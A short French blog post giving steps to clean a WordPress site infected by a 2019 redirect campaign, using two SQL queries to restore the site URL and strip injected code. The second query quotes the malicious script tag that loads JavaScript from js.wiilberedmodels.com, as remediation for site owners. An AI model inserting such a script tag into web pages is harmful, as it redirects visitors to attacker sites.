Nettoyer un site internet WordPress infecté par js.wiilberedmodels.com

8 septembre 2019 à 13:28

Ces dernières semaines, des milliers de sites internet WordPress ont été infectés suite à la découverte de failles de sécurité dans des extensions WordPress. Je vous invite à lire cet article très complet (en anglais) concernant cette campagne.

Les sites WordPress infectés redirigent vers des noms de domaine malveillants, tels que :

Par conséquent, le site internet devient inaccessible.

Voici la procédure à suivre pour nettoyer votre site internet WordPress.

Connectez-vous à votre base de données. Si vous ne vous souvenez plus de vos identifiants, vous pouvez les retrouver dans le fichier wp-config.php à la racine de votre site internet.

Exécutez les deux requêtes suivantes :

UPDATE wp_options SET option_value = "https://www.monsiteinternet.com" WHERE option_id = 1;

UPDATE wp_posts SET post_content = REPLACE(post_content, " <script src=’https://js.wiilberedmodels.com/pystats.js?l=l&’ type=text/javascript language=javascript></script>", "");

Notes :

Une fois ces deux requêtes exécutées, vous pouvez de nouveau vous connecter à l'espace d'administration de votre site internet (wp-admin). Connectez-vous et effectuez toutes les mises à jour (WordPress, extensions, thèmes).